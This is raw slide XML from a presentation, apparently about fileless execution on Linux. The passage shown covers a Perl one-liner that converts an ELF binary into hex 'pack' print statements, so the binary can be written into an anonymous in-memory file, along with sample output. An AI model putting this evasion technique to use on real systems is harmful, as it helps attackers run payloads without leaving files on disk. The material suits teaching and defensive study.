              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000" i="1" baseline="-25000"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052736"/>
            <a:ext cx="6624960" cy="5733602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16779804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dirty="0" smtClean="0"/>
              <a:t>Part 2</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34</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821382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2675467"/>
            <a:ext cx="8507287" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Next we need to make our binary available to Perl, so we can write it to the anonymous file. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>We’ll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>anonymous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Transfer a binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>print statements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37328493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5496" y="4437112"/>
            <a:ext cx="1584176" cy="216024"/>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8244408" y="4221088"/>
            <a:ext cx="792088" cy="216024"/>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35496" y="4221088"/>
            <a:ext cx="2339751"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8604448" y="2675467"/>
            <a:ext cx="432048" cy="321485"/>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8460432" y="2675467"/>
            <a:ext cx="144016" cy="321485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E79F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6660232" y="2675467"/>
            <a:ext cx="144016" cy="321485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E79F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6804248" y="2652866"/>
            <a:ext cx="1656184" cy="34408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72009" y="2996952"/>
            <a:ext cx="3491879" cy="28803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矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3059832" y="2675467"/>
            <a:ext cx="3600400" cy="32148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內容版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72009" y="2675467"/>
            <a:ext cx="9036495" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>$/=\32;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\$FH pack q/H*/, q/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unpack"H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\ or die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/write: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$!/;\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elfbinary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ay generate the following lines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$FH pack q/H*/, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>q/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7f454c4602010100000000000000000002003e0001000000304f450000000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/write: $!/;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/write: $!/;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
